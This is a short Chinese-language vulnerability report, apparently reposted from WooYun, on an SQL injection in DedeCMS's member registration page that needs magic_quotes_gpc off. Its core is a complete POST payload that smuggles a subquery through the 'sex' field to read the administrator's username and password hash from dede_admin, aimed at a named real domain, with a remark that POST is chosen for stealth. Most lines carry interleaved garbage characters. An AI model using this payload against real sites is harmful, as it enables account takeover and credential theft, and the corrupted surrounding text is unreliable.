漏洞类型: SQL注射漏洞
9 p7 F0 X: i8 w& u! U. {简要描述:# N4 E8 C4 x# e, b m! Z8 Z
& u6 Y. o' K A; U1 b需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
U [# R) `: A原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.! ]' }6 C. q& g$ @1 ]
详细说明:跟这个漏洞' G u' g) v% `% \
" c- W4 n3 _7 j6 ~) NWooYun: Dedecms SQL注射导致审核机制绕过漏洞 N- Z$ F$ ?4 n- Z! H
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
& J) p" C8 T5 F$ Y2 IPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
- u6 }6 g. z& u+ c1 j 0 F$ G& x9 B0 h4 U
www.political-security.com/member/reg_new.php& D7 s3 S( R8 P2 E: i9 J: A
+ ?+ |; k0 w( U' [$ d5 _
POST2 z9 V& q9 L) q' m5 e
: W; P- ]. G( `) a! V& T8 J
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&; j) v+ x7 v, \$ @5 ?9 _
userid=c4rp3nt3r&uname=c4rp3nt3r
2 M' u/ V1 B c" m' _&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss4 \) y! V$ s1 I) {0 Q/ ?2 r9 n/ y
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`, ~3 H5 _ ?- J4 G0 q- ?4 k
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');1 P" F+ [) \, ? Q4 L5 ^
%00&vdcode=glos&agree= |